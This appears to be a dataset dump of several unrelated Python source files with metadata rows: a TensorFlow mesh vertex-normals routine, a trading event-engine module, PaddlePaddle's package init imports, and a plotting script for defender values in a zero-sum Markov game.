common_batch_dims = shape.get_broadcasted_shape(vertices.shape[:-2],
indices.shape[:-2])
vertices_repeat = [
common_batch_dims[x] // vertices.shape.as_list()[x]
for x in range(len(common_batch_dims))
]
indices_repeat = [
common_batch_dims[x] // shape_indices[x]
for x in range(len(common_batch_dims))
]
vertices = tf.tile(
vertices, vertices_repeat + [1, 1], name="vertices_broadcast")
indices = tf.tile(
indices, indices_repeat + [1, 1], name="indices_broadcast")
# Triangulate non-triangular faces.
if shape_indices[-1] > 3:
triangle_indices = []
for i in range(1, shape_indices[-1] - 1):
triangle_indices.append(
tf.concat((indices[..., 0:1], indices[..., i:i + 2]), axis=-1))
indices = tf.concat(triangle_indices, axis=-2)
shape_indices = indices.shape.as_list()
face_vertices = gather_faces(vertices, indices)
# Use unnormalized face normals to scale normals by area.
mesh_face_normals = face_normals(
face_vertices, clockwise=clockwise, normalize=False)
if vertices.shape.ndims > 2:
outer_indices = np.meshgrid(
*[np.arange(i) for i in shape_indices[:-2]],
sparse=False,
indexing="ij")
outer_indices = [np.expand_dims(i, axis=-1) for i in outer_indices]
outer_indices = np.concatenate(outer_indices, axis=-1)
outer_indices = np.expand_dims(outer_indices, axis=-2)
outer_indices = tf.constant(outer_indices, dtype=tf.int32)
outer_indices = tf.tile(outer_indices, [1] * len(shape_indices[:-2]) +
[tf.shape(input=indices)[-2]] + [1])
unnormalized_vertex_normals = tf.zeros_like(vertices)
for i in range(shape_indices[-1]):
scatter_indices = tf.concat([outer_indices, indices[..., i:i + 1]],
axis=-1)
unnormalized_vertex_normals = tf.compat.v1.tensor_scatter_add(
unnormalized_vertex_normals, scatter_indices, mesh_face_normals)
else:
unnormalized_vertex_normals = tf.zeros_like(vertices)
for i in range(shape_indices[-1]):
unnormalized_vertex_normals = tf.compat.v1.tensor_scatter_add(
unnormalized_vertex_normals, indices[..., i:i + 1],
mesh_face_normals)
vector_norms = tf.sqrt(
tf.reduce_sum(
input_tensor=unnormalized_vertex_normals**2, axis=-1,
keepdims=True))
return safe_ops.safe_unsigned_div(unnormalized_vertex_normals, vector_norms)
# API contains all public functions and classes.
__all__ = export_api.get_functions_and_classes()
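# Illustrative usage sketch (not part of the original module): vertex normals for a
# unit square split into two triangles, following the shapes documented above
# (vertices are [V, 3], indices are [F, 3]). The sign of the normals depends on the
# winding convention selected through `clockwise`.
if __name__ == "__main__":
    square_vertices = tf.constant(
        [[0., 0., 0.], [1., 0., 0.], [1., 1., 0.], [0., 1., 0.]], dtype=tf.float32)
    square_indices = tf.constant([[0, 1, 2], [0, 2, 3]], dtype=tf.int32)
    print(vertex_normals(square_vertices, square_indices, clockwise=True))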
| 39.144681 | 80 | 0.678769 |
13fd212eb7923e35a380b483a671761992aaef1b | 4,090 | py | Python | helix/engines.py | phantomii/helix | 88a7270f20554943fa2cb22e1432d0f653ba9ae7 | [
"Apache-2.0"
] | null | null | null | helix/engines.py | phantomii/helix | 88a7270f20554943fa2cb22e1432d0f653ba9ae7 | [
"Apache-2.0"
] | null | null | null | helix/engines.py | phantomii/helix | 88a7270f20554943fa2cb22e1432d0f653ba9ae7 | [
"Apache-2.0"
] | null | null | null | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2016-2017 Eugene Frolov <eugene@frolov.net.ru>
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import logging
import threading
import time
import six
from helix.dm import events
from helix.events import base
class OnStartEngine(base.Event):
pass
class OnStopEngine(base.Event):
pass
LOG = logging.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
class AbstractGroupOfInstruments(object):
def __init__(self, instruments):
super(AbstractGroupOfInstruments, self).__init__()
self._instruments = instruments
def get_current_timestamp(self):
return time.time()
@abc.abstractmethod
def on_loop(self):
raise NotImplementedError()
def __iter__(self):
return iter(self._instruments)
class GroupOfHistoricalInstruments(AbstractGroupOfInstruments):
    def _select_instrument(self):
        # Pick the instrument whose next tick happens earliest.
        target_instrument = None
        next_tick_time = float("inf")
        for instrument in self._instruments:
            tick_timestamp = instrument.get_next_tick_info().timestamp
            if tick_timestamp < next_tick_time:
                next_tick_time = tick_timestamp
                target_instrument = instrument
        return target_instrument
def get_current_timestamp(self):
target_instrument = self._select_instrument()
return target_instrument.get_next_tick_info().timestamp
def on_loop(self):
target_instrument = self._select_instrument()
target_instrument.on_loop()
class EventEngine(threading.Thread):
"""Event engine
parameters:
:param event_bus: - Instance of helix.events.Eventbus class
:param instruments: - Instance of AbstractGroupOfInstruments child
"""
def __init__(self, event_bus, instruments):
super(EventEngine, self).__init__()
self._event_bus = event_bus
self._market_timestamp = 0
self._instruments = instruments
self._set_market_timestamp(instruments.get_current_timestamp())
self._idle_timeout = 10
self._event_bus.subscribe(OnStopEngine, self._stop_event_handler)
self._event_bus.subscribe(events.OnTickEvent,
self._set_market_timestamp_handler)
self._stop = False
    def get_idle_timeout(self):
return self._idle_timeout
def set_idle_timeout(self, timeout):
self._idle_timeout = timeout
def get_market_timestamp(self):
return self._market_timestamp
def _set_market_timestamp(self, timestamp):
if self._market_timestamp < timestamp:
self._market_timestamp = timestamp
def _set_market_timestamp_handler(self, event):
self._set_market_timestamp(event.get_tick().timestamp)
def get_instruments(self):
return self._instruments
def get_instrument(self, name):
for instrument in self._instruments:
if instrument.name == name:
return instrument
raise ValueError("Instrument %s not found" % name)
def get_event_bus(self):
return self._event_bus
def run(self):
self._event_bus.fire(OnStartEngine())
while not self._stop:
# get new tick events
self._instruments.on_loop()
if self._event_bus.is_empty():
time.sleep(self._idle_timeout)
self._event_bus.process_events()
LOG.info("Engine stopped")
def _stop_event_handler(self, event):
self._stop = True
def stop(self):
self._event_bus.fire(OnStopEngine())
| 28.013699 | 78 | 0.685575 |
02725751cb6694a774cd224c53a0bea6b8dc680b | 12,739 | py | Python | python/paddle/__init__.py | Joejiong/Paddle | 6d6ea569dc1e9ff15fdc774c79276b0f79444f5e | [
"Apache-2.0"
] | 1 | 2021-02-08T02:09:19.000Z | 2021-02-08T02:09:19.000Z | python/paddle/__init__.py | Joejiong/Paddle | 6d6ea569dc1e9ff15fdc774c79276b0f79444f5e | [
"Apache-2.0"
] | 1 | 2020-09-22T08:54:49.000Z | 2020-09-22T11:44:09.000Z | python/paddle/__init__.py | Joejiong/Paddle | 6d6ea569dc1e9ff15fdc774c79276b0f79444f5e | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
try:
from paddle.version import full_version as __version__
from paddle.version import commit as __git_commit__
except ImportError:
import sys
    sys.stderr.write('''Warning when importing paddle: you should not
import paddle from the source directory; please install paddlepaddle*.whl first.'''
)
import paddle.batch
batch = batch.batch
from .fluid import monkey_patch_variable
from .fluid.dygraph import monkey_patch_math_varbase
monkey_patch_variable()
monkey_patch_math_varbase()
import paddle.framework
from .framework import VarBase as Tensor
import paddle.compat
import paddle.distributed
import paddle.sysconfig
import paddle.tensor
import paddle.distribution
import paddle.nn
import paddle.distributed.fleet
import paddle.optimizer
import paddle.metric
import paddle.device
import paddle.regularizer
import paddle.incubate
import paddle.autograd
# TODO: define alias in tensor and framework directory
from .tensor.random import randperm
from .tensor.random import bernoulli
from .tensor.attribute import rank #DEFINE_ALIAS
from .tensor.attribute import shape #DEFINE_ALIAS
from .tensor.attribute import real #DEFINE_ALIAS
from .tensor.attribute import imag #DEFINE_ALIAS
from .tensor.creation import to_tensor #DEFINE_ALIAS
from .tensor.creation import diag #DEFINE_ALIAS
from .tensor.creation import eye #DEFINE_ALIAS
# from .tensor.creation import fill_constant #DEFINE_ALIAS
# from .tensor.creation import get_tensor_from_selected_rows #DEFINE_ALIAS
from .tensor.creation import linspace #DEFINE_ALIAS
from .tensor.creation import ones #DEFINE_ALIAS
from .tensor.creation import ones_like #DEFINE_ALIAS
from .tensor.creation import zeros #DEFINE_ALIAS
from .tensor.creation import zeros_like #DEFINE_ALIAS
from .tensor.creation import arange #DEFINE_ALIAS
from .tensor.creation import eye #DEFINE_ALIAS
from .tensor.creation import full #DEFINE_ALIAS
from .tensor.creation import full_like #DEFINE_ALIAS
from .tensor.creation import triu #DEFINE_ALIAS
from .tensor.creation import tril #DEFINE_ALIAS
from .tensor.creation import meshgrid #DEFINE_ALIAS
from .tensor.creation import empty #DEFINE_ALIAS
from .tensor.creation import empty_like #DEFINE_ALIAS
from .tensor.creation import assign #DEFINE_ALIAS
from .tensor.linalg import matmul #DEFINE_ALIAS
from .tensor.linalg import dot #DEFINE_ALIAS
# from .tensor.linalg import einsum #DEFINE_ALIAS
from .tensor.linalg import norm #DEFINE_ALIAS
from .tensor.linalg import transpose #DEFINE_ALIAS
from .tensor.linalg import dist #DEFINE_ALIAS
from .tensor.linalg import t #DEFINE_ALIAS
from .tensor.linalg import cross #DEFINE_ALIAS
from .tensor.linalg import cholesky #DEFINE_ALIAS
# from .tensor.linalg import tensordot #DEFINE_ALIAS
from .tensor.linalg import bmm #DEFINE_ALIAS
from .tensor.linalg import histogram #DEFINE_ALIAS
from .tensor.linalg import mv #DEFINE_ALIAS
from .tensor.logic import equal #DEFINE_ALIAS
from .tensor.logic import greater_equal #DEFINE_ALIAS
from .tensor.logic import greater_than #DEFINE_ALIAS
from .tensor.logic import is_empty #DEFINE_ALIAS
#from .tensor.logic import isfinite #DEFINE_ALIAS
from .tensor.logic import less_equal #DEFINE_ALIAS
from .tensor.logic import less_than #DEFINE_ALIAS
from .tensor.logic import logical_and #DEFINE_ALIAS
from .tensor.logic import logical_not #DEFINE_ALIAS
from .tensor.logic import logical_or #DEFINE_ALIAS
from .tensor.logic import logical_xor #DEFINE_ALIAS
from .tensor.logic import not_equal #DEFINE_ALIAS
from .tensor.logic import allclose #DEFINE_ALIAS
from .tensor.logic import equal_all #DEFINE_ALIAS
# from .tensor.logic import isnan #DEFINE_ALIAS
from .tensor.logic import is_tensor #DEFINE_ALIAS
from .tensor.manipulation import cast #DEFINE_ALIAS
from .tensor.manipulation import concat #DEFINE_ALIAS
from .tensor.manipulation import expand #DEFINE_ALIAS
from .tensor.manipulation import broadcast_to #DEFINE_ALIAS
from .tensor.manipulation import expand_as #DEFINE_ALIAS
from .tensor.manipulation import tile #DEFINE_ALIAS
from .tensor.manipulation import flatten #DEFINE_ALIAS
from .tensor.manipulation import gather #DEFINE_ALIAS
from .tensor.manipulation import gather_nd #DEFINE_ALIAS
from .tensor.manipulation import reshape #DEFINE_ALIAS
from .tensor.manipulation import reshape_ #DEFINE_ALIAS
from .tensor.manipulation import flip as reverse #DEFINE_ALIAS
from .tensor.manipulation import scatter #DEFINE_ALIAS
from .tensor.manipulation import scatter_ #DEFINE_ALIAS
from .tensor.manipulation import scatter_nd_add #DEFINE_ALIAS
from .tensor.manipulation import scatter_nd #DEFINE_ALIAS
from .tensor.manipulation import shard_index #DEFINE_ALIAS
from .tensor.manipulation import slice #DEFINE_ALIAS
from .tensor.manipulation import split #DEFINE_ALIAS
from .tensor.manipulation import squeeze #DEFINE_ALIAS
from .tensor.manipulation import squeeze_ #DEFINE_ALIAS
from .tensor.manipulation import stack #DEFINE_ALIAS
from .tensor.manipulation import strided_slice #DEFINE_ALIAS
from .tensor.manipulation import transpose #DEFINE_ALIAS
from .tensor.manipulation import unique #DEFINE_ALIAS
from .tensor.manipulation import unsqueeze #DEFINE_ALIAS
from .tensor.manipulation import unsqueeze_ #DEFINE_ALIAS
from .tensor.manipulation import unstack #DEFINE_ALIAS
from .tensor.manipulation import flip #DEFINE_ALIAS
from .tensor.manipulation import unbind #DEFINE_ALIAS
from .tensor.manipulation import roll #DEFINE_ALIAS
from .tensor.manipulation import chunk #DEFINE_ALIAS
from .tensor.math import abs #DEFINE_ALIAS
from .tensor.math import acos #DEFINE_ALIAS
from .tensor.math import asin #DEFINE_ALIAS
from .tensor.math import atan #DEFINE_ALIAS
from .tensor.math import ceil #DEFINE_ALIAS
from .tensor.math import cos #DEFINE_ALIAS
from .tensor.math import tan #DEFINE_ALIAS
from .tensor.math import cosh #DEFINE_ALIAS
from .tensor.math import cumsum #DEFINE_ALIAS
# from .tensor.math import elementwise_add #DEFINE_ALIAS
# from .tensor.math import elementwise_div #DEFINE_ALIAS
# from .tensor.math import elementwise_floordiv #DEFINE_ALIAS
# from .tensor.math import elementwise_mod #DEFINE_ALIAS
# from .tensor.math import elementwise_pow #DEFINE_ALIAS
# from .tensor.math import elementwise_sub #DEFINE_ALIAS
from .tensor.math import exp #DEFINE_ALIAS
from .tensor.math import floor #DEFINE_ALIAS
from .tensor.math import increment #DEFINE_ALIAS
from .tensor.math import log #DEFINE_ALIAS
from .tensor.math import log2 #DEFINE_ALIAS
from .tensor.math import log10 #DEFINE_ALIAS
from .tensor.math import multiplex #DEFINE_ALIAS
from .tensor.math import pow #DEFINE_ALIAS
from .tensor.math import reciprocal #DEFINE_ALIAS
# from .tensor.math import reduce_max #DEFINE_ALIAS
# from .tensor.math import reduce_min #DEFINE_ALIAS
# from .tensor.math import reduce_prod #DEFINE_ALIAS
# from .tensor.math import reduce_sum #DEFINE_ALIAS
from .tensor.math import all #DEFINE_ALIAS
from .tensor.math import any #DEFINE_ALIAS
from .tensor.math import round #DEFINE_ALIAS
from .tensor.math import rsqrt #DEFINE_ALIAS
from .tensor.math import scale #DEFINE_ALIAS
from .tensor.math import sign #DEFINE_ALIAS
from .tensor.math import sin #DEFINE_ALIAS
from .tensor.math import sinh #DEFINE_ALIAS
from .tensor.math import sqrt #DEFINE_ALIAS
from .tensor.math import square #DEFINE_ALIAS
from .tensor.math import stanh #DEFINE_ALIAS
from .tensor.math import sum #DEFINE_ALIAS
from .tensor.math import tanh #DEFINE_ALIAS
from .tensor.math import tanh_ #DEFINE_ALIAS
from .tensor.math import add_n #DEFINE_ALIAS
from .tensor.math import max #DEFINE_ALIAS
from .tensor.math import maximum #DEFINE_ALIAS
from .tensor.math import min #DEFINE_ALIAS
from .tensor.math import minimum #DEFINE_ALIAS
from .tensor.math import mm #DEFINE_ALIAS
from .tensor.math import divide #DEFINE_ALIAS
from .tensor.math import floor_divide #DEFINE_ALIAS
from .tensor.math import remainder #DEFINE_ALIAS
from .tensor.math import mod #DEFINE_ALIAS
from .tensor.math import floor_mod #DEFINE_ALIAS
from .tensor.math import multiply #DEFINE_ALIAS
from .tensor.math import add #DEFINE_ALIAS
from .tensor.math import subtract #DEFINE_ALIAS
from .tensor.math import atan #DEFINE_ALIAS
from .tensor.math import logsumexp #DEFINE_ALIAS
from .tensor.math import inverse #DEFINE_ALIAS
from .tensor.math import log1p #DEFINE_ALIAS
from .tensor.math import erf #DEFINE_ALIAS
from .tensor.math import addmm #DEFINE_ALIAS
from .tensor.math import clip #DEFINE_ALIAS
from .tensor.math import trace #DEFINE_ALIAS
from .tensor.math import kron #DEFINE_ALIAS
from .tensor.math import isfinite #DEFINE_ALIAS
from .tensor.math import isinf #DEFINE_ALIAS
from .tensor.math import isnan #DEFINE_ALIAS
from .tensor.math import prod #DEFINE_ALIAS
from .tensor.math import broadcast_shape #DEFINE_ALIAS
from .tensor.math import conj #DEFINE_ALIAS
from .tensor.random import multinomial #DEFINE_ALIAS
from .tensor.random import standard_normal
from .tensor.random import normal
from .tensor.random import uniform #DEFINE_ALIAS
from .tensor.random import randn #DEFINE_ALIAS
from .tensor.random import rand #DEFINE_ALIAS
from .tensor.random import randint #DEFINE_ALIAS
from .tensor.random import randperm #DEFINE_ALIAS
from .tensor.search import argmax #DEFINE_ALIAS
from .tensor.search import argmin #DEFINE_ALIAS
from .tensor.search import argsort #DEFINE_ALIAS
# from .tensor.search import has_inf #DEFINE_ALIAS
# from .tensor.search import has_nan #DEFINE_ALIAS
from .tensor.search import masked_select #DEFINE_ALIAS
from .tensor.search import topk #DEFINE_ALIAS
from .tensor.search import where #DEFINE_ALIAS
from .tensor.search import index_select #DEFINE_ALIAS
from .tensor.search import nonzero #DEFINE_ALIAS
from .tensor.search import sort #DEFINE_ALIAS
from .tensor.to_string import set_printoptions #DEFINE_ALIAS
from .framework.random import seed #DEFINE_ALIAS
from .framework.random import get_cuda_rng_state #DEFINE_ALIAS
from .framework.random import set_cuda_rng_state #DEFINE_ALIAS
from .framework import ParamAttr #DEFINE_ALIAS
# from .framework import create_global_var #DEFINE_ALIAS
from .framework import create_parameter #DEFINE_ALIAS
from .framework import CPUPlace #DEFINE_ALIAS
from .framework import CUDAPlace #DEFINE_ALIAS
from .framework import CUDAPinnedPlace #DEFINE_ALIAS
from .framework import grad #DEFINE_ALIAS
from .framework import no_grad #DEFINE_ALIAS
from .framework import save #DEFINE_ALIAS
from .framework import load #DEFINE_ALIAS
from .framework import DataParallel #DEFINE_ALIAS
from .framework import set_default_dtype #DEFINE_ALIAS
from .framework import get_default_dtype #DEFINE_ALIAS
from .tensor.search import index_sample #DEFINE_ALIAS
from .tensor.stat import mean #DEFINE_ALIAS
# from .tensor.stat import reduce_mean #DEFINE_ALIAS
from .tensor.stat import std #DEFINE_ALIAS
from .tensor.stat import var #DEFINE_ALIAS
# from .fluid.data import data
from .tensor.stat import numel #DEFINE_ALIAS
from .tensor.stat import median #DEFINE_ALIAS
from .device import get_cudnn_version
from .device import set_device
from .device import get_device
from .device import is_compiled_with_cuda #DEFINE_ALIAS
from .device import is_compiled_with_xpu
from .device import XPUPlace
# from .tensor.tensor import Tensor #DEFINE_ALIAS
# from .tensor.tensor import LoDTensor #DEFINE_ALIAS
# from .tensor.tensor import LoDTensorArray #DEFINE_ALIAS
from .fluid.dygraph.base import enable_dygraph as disable_static #DEFINE_ALIAS
from .fluid.dygraph.base import disable_dygraph as enable_static #DEFINE_ALIAS
from .fluid.framework import in_dygraph_mode as in_dynamic_mode #DEFINE_ALIAS
from .fluid.layers import crop_tensor as crop #DEFINE_ALIAS
from . import jit
from . import static
from . import amp
from . import onnx
# high-level api
from .hapi import Model
from .hapi import callbacks
from .hapi import summary
from .hapi import flops
import paddle.text
import paddle.vision
disable_static()
| 44.079585 | 90 | 0.81278 |
7cdbe5c5563fc4649f21b2c662a3f27ea1cdec9c | 12,317 | py | Python | src/zero_sum/plots.py | sbhambr1/MarkovGameSolvers | cd5366faf2082e467dc0ef04c52c5b5b000e9176 | [
"MIT"
] | null | null | null | src/zero_sum/plots.py | sbhambr1/MarkovGameSolvers | cd5366faf2082e467dc0ef04c52c5b5b000e9176 | [
"MIT"
] | null | null | null | src/zero_sum/plots.py | sbhambr1/MarkovGameSolvers | cd5366faf2082e467dc0ef04c52c5b5b000e9176 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
import numpy as np
strategies = np.array([
[
#gamma = 0.5
[-9.563336572173805, -8.193748914742143, -10.270220524396596, -3.0000000000000004, -7.553846153846153, -7.904142011834319, -3.0, -3.0, -3.0, -3.0],
[-7.378487640724603, -3.3197512739857147, -7.496142688168831, -3.0000000000000004, -3.0, -3.0, -3.0, -3.0, -3.0, -3.0],
[-9.314285714285715, -6.0, -11.8, -6.0, -6.0, -6.0, -6.0, -6.0, -6.0, -6.0]
],
[
#gamma = 0.55
[-10.524329851693846, -9.121195380360348, -11.382794510864285, -3.333333333333334, -8.308123249299719, -8.767977779347031, -3.333333333333334, -3.333333333333334, -3.333333333333334, -3.333333333333334],
[-7.853847828218031, -3.71793284163171, -7.966237505840968, -3.333333333333334, -3.333333333333333, -3.333333333333333, -3.333333333333334, -3.333333333333334, -3.333333333333334, -3.333333333333334],
[-10.028985507246377, -6.666666666666666, -13.11111111111111, -6.666666666666666, -6.666666666666666, -6.666666666666666, -6.666666666666666, -6.666666666666666, -6.666666666666666, -6.666666666666666]
],
[
#gamma = 0.6
[-11.719684181565645, -10.273338406900049, -12.76628614916286, -3.75, -9.231481481481477, -9.840534979423865, -3.75, -3.75, -3.75, -3.75],
[-8.42965572232598, -4.21204039850597, -8.528273788767603, -3.7499999999999982, -3.7499999999999982, -3.7499999999999982, -3.7499999999999982, -3.7499999999999982, -3.7499999999999982, -3.7499999999999982],
[-10.911764705882351, -7.499999999999999, -14.441176470588236, -7.499999999999999, -7.499999999999999, -7.499999999999999, -7.499999999999999, -7.499999999999999, -7.499999999999999, -7.499999999999999]
],
[
#gamma = 0.65
[-13.246274902675406, -11.742746583844642, -14.533245644719841, -4.285714285714285, -10.388807069219439, -11.206747339173734, -4.285714285714285, -4.285714285714285, -4.285714285714285, -4.285714285714285],
[-9.145905020699661, -4.841618667247477, -9.218958552423087, -4.285714285714285, -4.285714285714285, -4.285714285714285, -4.285714285714283, -4.285714285714283, -4.285714285714283, -4.285714285714283],
[-12.03411513859275, -8.57142857142857, -15.616204690831555, -8.57142857142857, -8.57142857142857, -8.57142857142857, -8.57142857142857, -8.57142857142857, -8.57142857142857, -8.57142857142857]
],
[
#gamma = 0.7
[-15.26280962470669, -13.681019910677742, -16.868493443177165, -4.999999999999998, -11.883720930232553, -13.004326663061104, -4.999999999999998, -4.999999999999998, -4.999999999999998, -4.999999999999998],
[-10.068193838520614, -5.671752735193775, -10.099054988853647, -4.999999999999998, -4.999999999999998, -4.999999999999998, -4.999999999999998, -4.999999999999998, -4.999999999999998, -4.999999999999998],
[-13.515151515151512, -9.999999999999996, -17.15151515151515, -9.999999999999996, -9.999999999999996, -9.999999999999996, -9.999999999999996, -9.999999999999996, -9.999999999999996, -9.999999999999996]
],
[
#gamma = 0.75
[-18.048619027086353, -16.354914089347076, -20.098144329896904, -5.999999999999999, -13.893333333333327, -15.47199999999999, -5.999999999999998, -5.999999999999998, -5.999999999999998, -5.999999999999998],
[-11.364085664816024, -6.829408299891047, -11.362958194659226, -5.999999999999998, -5.999999999999998, -5.999999999999998, -5.999999999999998, -5.999999999999998, -5.999999999999998, -5.999999999999998],
[-15.569230769230767, -11.999999999999996, -19.261538461538457, -11.999999999999996, -11.999999999999996, -11.999999999999996, -11.999999999999996, -11.999999999999996, -11.999999999999996, -11.999999999999996]
],
[
#gamma = 0.8
[-22.14552188552189, -20.28181818181818, -24.856363636363632, -7.500000000000002, -16.749999999999993, -19.062499999999993, -7.5, -7.500000000000002, -7.500000000000002, -7.500000000000002],
[-13.227691215343736, -8.540503875101978, -13.175865235686418, -7.5, -7.500000000000001, -7.5, -7.499999999999998, -7.5, -7.5, -7.5],
[-18.625, -15.0, -22.375, -15.0, -15.0, -15.0, -15.0, -15.0, -15.0, -15.0]
],
[
#gamma = 0.85
[-28.76278844268961, -26.61680527433105, -32.56131830251732, -9.999999999999993, -21.169811320754697, -24.752580989676016, -9.999999999999993, -9.999999999999993, -9.999999999999993, -9.999999999999993],
[-16.183356468130675, -11.33189687650437, -16.033301790463963, -9.999999999999993, -9.999999999999991, -9.999999999999993, -9.999999999999993, -9.999999999999993, -9.999999999999993, -9.999999999999993],
[-23.68253968253967, -19.999999999999986, -27.49206349206348, -19.999999999999986, -19.999999999999986, -19.999999999999986, -19.999999999999986, -19.999999999999986, -19.999999999999986, -19.999999999999986]
],
[
#gamma = 0.9
[-41.27742867847752, -38.58932362753994, -47.172156505914224, -14.999999999999755, -29.095238095237843, -35.13605442176845, -14.999999999999753, -14.999999999999753, -14.999999999999753, -14.999999999999753],
[-21.789898957859354, -16.75709624029196, -21.448166972857727, -14.99999999999974, -14.99999999999974, -14.999999999999744, -14.999999999999735, -14.999999999999744, -14.999999999999744, -14.999999999999744],
[-33.74193548387047, -29.999999999999503, -37.61290322580595, -29.999999999999503, -29.999999999999503, -29.999999999999503, -29.999999999999503, -29.999999999999503, -29.999999999999503, -29.999999999999503]
],
[
#gamma = 0.95
[-74.330382553884, -70.25959327963282, -85.68377649107512, -29.99999408538547, -49.09676827893381, -60.80124278465696, -29.999994085385474, -29.99999408538546, -29.999994085385453, -29.999994085385445],
[-37.67557701062915, -32.430971145564975, -36.94165998316571, -29.999994085385467, -29.999994085385474, -29.99999408538546, -29.999994085385474, -29.99999408538546, -29.999994085385453, -29.999994085385445],
[-63.80326685929545, -59.99998817077086, -67.73769308880364, -59.99998817077086, -59.99998817077086, -59.99998817077086, -59.99998817077086, -59.99998817077086, -59.99998817077086, -59.99998817077086]
]
])
gamma = np.array([0.5,0.55,0.6,0.65,0.7,0.75,0.8,0.85,0.9,0.95])
#Plot 1
V0_URS = []
V0_OPT = []
V0_MMP = []
for i in range(len(strategies)):
V0_URS.append(strategies[i][0][0])
V0_OPT.append(strategies[i][1][0])
V0_MMP.append(strategies[i][2][0])
plt.plot(gamma, np.asarray(V0_URS), marker='o')
plt.plot(gamma, np.asarray(V0_OPT), marker='x')
plt.plot(gamma, np.asarray(V0_MMP), marker='+')
plt.ylabel("Defender's Utility $\longrightarrow$")
plt.xlabel("$\gamma \longrightarrow$")
plt.title("Defender's value in state S0.")
plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left')
plt.show()
#Plot 2
V1_URS = []
V1_OPT = []
V1_MMP = []
for i in range(len(strategies)):
V1_URS.append(strategies[i][0][1])
V1_OPT.append(strategies[i][1][1])
V1_MMP.append(strategies[i][2][1])
plt.plot(gamma, np.asarray(V1_URS), marker='o')
plt.plot(gamma, np.asarray(V1_OPT), marker='x')
plt.plot(gamma, np.asarray(V1_MMP), marker='+')
plt.ylabel("Defender's Utility $\longrightarrow$")
plt.xlabel("$\gamma \longrightarrow$")
plt.title("Defender's value in state S1.")
plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left')
plt.show()
#Plot 3
V2_URS = []
V2_OPT = []
V2_MMP = []
for i in range(len(strategies)):
V2_URS.append(strategies[i][0][2])
V2_OPT.append(strategies[i][1][2])
V2_MMP.append(strategies[i][2][2])
plt.plot(gamma, np.asarray(V2_URS), marker='o')
plt.plot(gamma, np.asarray(V2_OPT), marker='x')
plt.plot(gamma, np.asarray(V2_MMP), marker='+')
plt.ylabel("Defender's Utility $\longrightarrow$")
plt.xlabel("$\gamma \longrightarrow$")
plt.title("Defender's value in state S2.")
plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left')
plt.show()
#Plot 4
V3_URS = []
V3_OPT = []
V3_MMP = []
for i in range(len(strategies)):
V3_URS.append(strategies[i][0][3])
V3_OPT.append(strategies[i][1][3])
V3_MMP.append(strategies[i][2][3])
plt.plot(gamma, np.asarray(V3_URS), marker='o')
plt.plot(gamma, np.asarray(V3_OPT), marker='x')
plt.plot(gamma, np.asarray(V3_MMP), marker='+')
plt.ylabel("Defender's Utility $\longrightarrow$")
plt.xlabel("$\gamma \longrightarrow$")
plt.title("Defender's value in state S3.")
plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left')
plt.show()
#Plot 5
V4_URS = []
V4_OPT = []
V4_MMP = []
for i in range(len(strategies)):
V4_URS.append(strategies[i][0][4])
V4_OPT.append(strategies[i][1][4])
V4_MMP.append(strategies[i][2][4])
plt.plot(gamma, np.asarray(V4_URS), marker='o')
plt.plot(gamma, np.asarray(V4_OPT), marker='x')
plt.plot(gamma, np.asarray(V4_MMP), marker='+')
plt.ylabel("Defender's Utility $\longrightarrow$")
plt.xlabel("$\gamma \longrightarrow$")
plt.title("Defender's value in state S4.")
plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left')
plt.show()
#Plot 6
V5_URS = []
V5_OPT = []
V5_MMP = []
for i in range(len(strategies)):
V5_URS.append(strategies[i][0][5])
V5_OPT.append(strategies[i][1][5])
V5_MMP.append(strategies[i][2][5])
plt.plot(gamma, np.asarray(V5_URS), marker='o')
plt.plot(gamma, np.asarray(V5_OPT), marker='x')
plt.plot(gamma, np.asarray(V5_MMP), marker='+')
plt.ylabel("Defender's Utility $\longrightarrow$")
plt.xlabel("$\gamma \longrightarrow$")
plt.title("Defender's value in state S5.")
plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left')
plt.show()
#Plot 7
V6_URS = []
V6_OPT = []
V6_MMP = []
for i in range(len(strategies)):
V6_URS.append(strategies[i][0][6])
V6_OPT.append(strategies[i][1][6])
V6_MMP.append(strategies[i][2][6])
plt.plot(gamma, np.asarray(V6_URS), marker='o')
plt.plot(gamma, np.asarray(V6_OPT), marker='x')
plt.plot(gamma, np.asarray(V6_MMP), marker='+')
plt.ylabel("Defender's Utility $\longrightarrow$")
plt.xlabel("$\gamma \longrightarrow$")
plt.title("Defender's value in state S6.")
plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left')
plt.show()
#Plot 8
V7_URS = []
V7_OPT = []
V7_MMP = []
for i in range(len(strategies)):
V7_URS.append(strategies[i][0][7])
V7_OPT.append(strategies[i][1][7])
V7_MMP.append(strategies[i][2][7])
plt.plot(gamma, np.asarray(V7_URS), marker='o')
plt.plot(gamma, np.asarray(V7_OPT), marker='x')
plt.plot(gamma, np.asarray(V7_MMP), marker='+')
plt.ylabel("Defender's Utility $\longrightarrow$")
